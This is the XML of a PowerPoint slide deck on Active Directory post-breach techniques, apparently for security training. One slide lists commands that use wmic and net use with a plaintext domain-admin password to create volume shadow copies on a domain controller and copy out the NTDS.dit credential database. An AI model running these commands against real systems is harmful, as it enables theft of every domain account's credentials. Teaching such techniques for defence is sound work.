                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> list shadows 2&gt;&amp;1 &gt; C:\tempoutput.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wmic /node:DC1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:CONTOSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\administrator /password:domainadminsvc123 process call create "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vssadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> create shadow /for=C: 2&gt;&amp;1 &gt; C:\temp\output.txt“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wmic /node:DC1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:CONTOSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\administrator /password:domainadminsvc123 process call create "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2&gt;&amp;1 &gt; C:\temp\output.txt“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net use \\DC1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:CONTOSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\administrator domainadminsvc123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> \\DC1\C$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303858101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6626226E27B74892394EFBDF922767" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152570cd3fc9b8a13f8562978e27c845">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="517b36ea-b140-47be-8d07-387acfc90838" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fb42bc1207acbf64cdd6bca3047c1efa" ns2:_="">
    <xsd:import namespace="517b36ea-b140-47be-8d07-387acfc908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7b36ea-b140-47be-8d07-387acfc90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140B17-0E85-40FB-904D-6E0A38E3BAB5}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="517b36ea-b140-47be-8d07-387acfc9083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6EDAFE3-5C86-4674-95DB-E48062DF6B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7b36ea-b140-47be-8d07-387acfc908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2653</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personnalisé</PresentationFormat>
  <Paragraphs>389</Paragraphs>
  <Slides>38</Slides>
  <Notes>38</Notes>
  <HiddenSlides>11</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38</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="47" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Segoe UI Semilight</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>WHITE TEMPLATE</vt:lpstr>
      <vt:lpstr>Active Directory Threats Landscape Section 2 - Post-breach techniques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modified xsi:type="dcterms:W3CDTF">2018-11-21T10:33:36Z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0x010100536626226E27B74892394EFBDF922767</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